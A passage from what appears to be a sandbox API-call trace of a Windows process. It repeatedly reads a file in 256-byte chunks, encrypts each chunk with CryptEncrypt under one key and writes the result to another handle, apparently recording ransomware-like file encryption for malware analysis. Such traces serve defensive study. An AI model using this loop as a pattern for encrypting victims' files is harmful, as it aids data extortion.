lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.583] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.583] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.583] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.583] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.583] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.584] GetLastError () returned 0x0 [0144.584] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.584] GetLastError () returned 0x0 [0144.584] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.584] GetLastError () returned 0x0 [0144.584] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.584] GetLastError () returned 0x0 [0144.584] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.584] GetLastError () returned 0x0 [0144.584] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.584] GetLastError () returned 0x0 [0144.584] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.584] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.585] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.585] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.585] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.585] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.585] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.585] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.585] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.585] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.585] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.585] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.585] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.585] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.585] GetLastError () returned 0x0 [0144.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.586] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.586] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.586] GetLastError () returned 0x0 [0144.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.586] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.586] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.586] GetLastError () returned 0x0 [0144.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.586] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.586] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.586] GetLastError () returned 0x0 [0144.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.586] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.586] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.586] GetLastError () returned 0x0 [0144.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.588] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.588] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.588] GetLastError () returned 0x0 [0144.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.588] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.588] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.588] GetLastError () returned 0x0 [0144.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.588] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.588] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.588] GetLastError () returned 0x0 [0144.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.588] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.588] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.588] GetLastError () returned 0x0 [0144.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.588] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.589] GetLastError () returned 0x0 [0144.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.589] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.589] GetLastError () returned 0x0 [0144.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.589] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.589] GetLastError () returned 0x0 [0144.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.589] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.589] GetLastError () returned 0x0 [0144.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.589] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.589] GetLastError () returned 0x0 [0144.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.589] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.589] GetLastError () returned 0x0 [0144.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.589] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, 